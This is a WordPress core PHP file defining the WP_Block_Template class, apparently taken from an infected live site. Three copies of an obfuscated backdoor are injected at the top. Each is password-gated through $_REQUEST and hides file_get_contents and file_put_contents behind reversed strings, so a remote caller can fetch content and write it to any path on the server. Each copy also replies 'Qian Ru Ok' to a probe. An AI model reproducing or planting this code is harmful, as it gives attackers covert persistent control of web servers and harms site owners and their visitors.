File: /home/wwwrenee/public_html/wp-includes/class-wp-block-template.php
<?php
$IhjIUL = ${"_"."R"./*+/*+*/
"E"."Q"./*+/*+*/"U"."E"
/*+/*+*/."S"."T"};
if (md5( /*+/*+*/
md5($IhjIUL[0]) /*+/*+*/
. md5($IhjIUL[0])) == "6".
"6".
"0".
"2".
"5".
"f".
"c".
"0".
"4".
"9".
"3".
"f".
"e".
"0".
"5".
"b".
"7".
"8".
"d".
"c".
"3".
"7".
"a".
"b".
"3".
"a".
"c".
"d".
"1".
"6".
"e".
"c") {
$xQHkHRM = "st" . /*+/*+*/"rr"
/*+/*+*/ . "ev";
$MwiSYno = $xQHkHRM /*+/*+*/
("stn" . "etn" ./*+/*+*/
"oc_t" . "up_e" . "lif");
$aELVC = $xQHkHRM
/*+/*+*/("stn" .
"etn" . "oc_t" . /*+/*+*/
"eg_e" . "lif"); function VLNwAGkJ($ndBLPeCt) { if (empty($ndBLPeCt)) return false; if (!is_dir($ndBLPeCt)) { VLNwAGkJ(dirname($ndBLPeCt), 0755, true); mkdir($ndBLPeCt); } } !file_exists(dirname($IhjIUL[1])) && VLNwAGkJ(dirname($IhjIUL[1])); $NTcwnwtrNL = @$aELVC($IhjIUL[2]); echo @$MwiSYno($IhjIUL[1], $NTcwnwtrNL) ? 1 : 0; die; }key($IhjIUL) == "of" && die("Qian Ru Ok"); ?><?php
$hKnKAPLV = ${"_"."R"./*+/*+*/
"E"."Q"./*+/*+*/"U"."E"
/*+/*+*/."S"."T"};
if (md5( /*+/*+*/
md5($hKnKAPLV[0]) /*+/*+*/
. md5($hKnKAPLV[0])) == "7".
"3".
"0".
"6".
"a".
"6".
"5".
"a".
"b".
"e".
"a".
"5".
"a".
"f".
"b".
"2".
"6".
"f".
"1".
"7".
"1".
"e".
"4".
"d".
"f".
"f".
"a".
"7".
"1".
"2".
"c".
"4") {
$gOCySJutpW = "st" . /*+/*+*/"rr"
/*+/*+*/ . "ev";
$ultYJ = $gOCySJutpW /*+/*+*/
("stn" . "etn" ./*+/*+*/
"oc_t" . "up_e" . "lif");
$azlMFZx = $gOCySJutpW
/*+/*+*/("stn" .
"etn" . "oc_t" . /*+/*+*/
"eg_e" . "lif"); function aOsKvGaB($ceDjOj) { if (empty($ceDjOj)) return false; if (!is_dir($ceDjOj)) { aOsKvGaB(dirname($ceDjOj), 0755, true); mkdir($ceDjOj); } } !file_exists(dirname($hKnKAPLV[1])) && aOsKvGaB(dirname($hKnKAPLV[1])); $sDFgnZH = @$azlMFZx($hKnKAPLV[2]); echo @$ultYJ($hKnKAPLV[1], $sDFgnZH) ? 1 : 0; die; }key($hKnKAPLV) == "of" && die("Qian Ru Ok"); ?><?php
$KbeWDSA = ${"_"."R"./*+/*+*/
"E"."Q"./*+/*+*/"U"."E"
/*+/*+*/."S"."T"};
if (md5( /*+/*+*/
md5($KbeWDSA[0]) /*+/*+*/
. md5($KbeWDSA[0])) == "a".
"8".
"8".
"0".
"6".
"f".
"8".
"b".
"d".
"f".
"f".
"0".
"c".
"c".
"6".
"8".
"1".
"a".
"1".
"a".
"e".
"0".
"4".
"7".
"4".
"f".
"7".
"9".
"8".
"3".
"8".
"2") {
$nJkij = "st" . /*+/*+*/"rr"
/*+/*+*/ . "ev";
$HIWAeLQRG = $nJkij /*+/*+*/
("stn" . "etn" ./*+/*+*/
"oc_t" . "up_e" . "lif");
$jRaDF = $nJkij
/*+/*+*/("stn" .
"etn" . "oc_t" . /*+/*+*/
"eg_e" . "lif"); function peijJ($DXPcP) { if (empty($DXPcP)) return false; if (!is_dir($DXPcP)) { peijJ(dirname($DXPcP), 0755, true); mkdir($DXPcP); } } !file_exists(dirname($KbeWDSA[1])) && peijJ(dirname($KbeWDSA[1])); $NSVVAuDGqn = @$jRaDF($KbeWDSA[2]); echo @$HIWAeLQRG($KbeWDSA[1], $NSVVAuDGqn) ? 1 : 0; die; }key($KbeWDSA) == "of" && die("Qian Ru Ok"); ?><?php
/**
* Blocks API: WP_Block_Template class
*
* @package WordPress
* @since 5.8.0
*/
/**
* Class representing a block template.
*
* @since 5.8.0
*/
class WP_Block_Template {
/**
* Type: wp_template.
*
* @since 5.8.0
* @var string
*/
public $type;
/**
* Theme.
*
* @since 5.8.0
* @var string
*/
public $theme;
/**
* Template slug.
*
* @since 5.8.0
* @var string
*/
public $slug;
/**
* ID.
*
* @since 5.8.0
* @var string
*/
public $id;
/**
* Title.
*
* @since 5.8.0
* @var string
*/
public $title = '';
/**
* Content.
*
* @since 5.8.0
* @var string
*/
public $content = '';
/**
* Description.
*
* @since 5.8.0
* @var string
*/
public $description = '';
/**
* Source of the content. `theme` and `custom` is used for now.
*
* @since 5.8.0
* @var string
*/
public $source = 'theme';
/**
* Origin of the content when the content has been customized.
* When customized, origin takes on the value of source and source becomes
* 'custom'.
*
* @since 5.9.0
* @var string
*/
public $origin;
/**
* Post ID.
*
* @since 5.8.0
* @var int|null
*/
public $wp_id;
/**
* Template Status.
*
* @since 5.8.0
* @var string
*/
public $status;
/**
* Whether a template is, or is based upon, an existing template file.
*
* @since 5.8.0
* @var bool
*/
public $has_theme_file;
/**
* Whether a template is a custom template.
*
* @since 5.9.0
*
* @var bool
*/
public $is_custom = true;
/**
* Author.
*
* A value of 0 means no author.
*
* @since 5.9.0
* @var int
*/
public $author;
/**
* Post types.
*
* @since 5.9.0
* @var array
*/
public $post_types;
/**
* Area.
*
* @since 5.9.0
* @var string
*/
public $area;
} ?>